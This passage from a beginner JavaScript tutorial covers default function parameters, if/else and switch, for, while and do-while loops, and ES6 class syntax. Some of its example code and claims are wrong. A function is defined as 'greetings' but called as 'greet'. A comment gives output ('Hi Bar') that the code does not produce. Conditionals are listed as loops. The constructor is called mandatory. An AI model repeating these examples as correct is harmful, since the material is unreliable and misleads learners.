]Functions
function greetings({ name = 'Foo' } = {}) { //Defaulting name to Foo
console.log(`Hello ${name}!`);
}
greet() // Hello Foo
greet({ name: 'Bar' }) // Hi BarLoops
1. If:
IF is used to execute a block of code based on a condition.
Syntax
if(condition){
// code
}2. If-Else:
Else part is used to execute the block of code when the condition fails.
Syntax
if(condition){
// code
} else {
// code
}3. Switch:
Switch is used to replace nested If-Else statements.
Syntax
switch(condition){
case 'value1' :
//code
[break;]
case 'value2' :
//code
[break;]
.......
default :
//code
[break;]
}4. For
For loop is used to iterate a set of statements based on a condition.
for(Initialization; Condition; Increment/decrement){
//code
} 5. While
While is also used to iterate a set of statements based on a condition. Usually while is preferred when number of iterations are not known in advance.
while (condition) {
// code
} 6. Do-While
Do-while is also used to iterate a set of statements based on a condition. It is mostly used when you need to execute the statements atleast once.
do {
// code
} while (condition); Classes
ES6 introduced classes along with OOPS concepts in JS. Class is similar to a function which you can think like kind of template which will get called when ever you initialize class.
Syntax:
class className {
constructor() { ... } //Mandatory Class method
method1() { ... }
method2() { ... }
...
}Example:
class Mobile {
constructor(model) {
this.name = model;
}
}
mbl = new Mobile("iPhone");